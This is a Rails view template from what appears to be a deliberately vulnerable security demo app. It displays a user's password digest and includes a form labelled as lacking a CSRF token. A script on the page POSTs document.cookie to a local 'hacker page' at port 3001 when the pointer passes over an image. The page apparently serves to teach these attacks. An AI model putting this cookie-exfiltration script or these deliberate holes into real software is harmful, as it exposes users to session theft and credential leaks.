<p id="notice"><%= notice %></p>

<p>
  <b>Email:</b>
  <%= @user.email %>
</p>

<p>
  <b>Password digest:</b>
  <%= @user.password_digest %>
</p>

<p>
  <b>Username:</b>
  <%= @user.username %>
</p>

<form action="/no_csrf_protection_form" method="post">
  <div class="info">This form has no csrf token</div>
  First name: <input type="text" name="fname"><br>
  Last name: <input type="text" name="lname"><br>
  <input type="submit" value="Submit">
</form>

<form action="/csrf_protection_with_captcha" method="post">
  <div class="info">This form has captcha</div>
  <%= render partial: "captcha" %>
</form>

<div>
  <div class="info">Move pointer enter below image to send cookie to hacker page</div>
  <img id="cookie" src="" height="30" width="30">
</div>

<%= link_to 'Edit', edit_user_path(@user) %> |
<%= link_to 'Back', users_path %>

<script type="text/javascript">
  $('#cookie').mouseenter(function() {
    $.ajax({
      type: "POST",
      url: "http://0.0.0.0:3001/cookies",
      data: { cookie : document.cookie }
    })
  })
</script>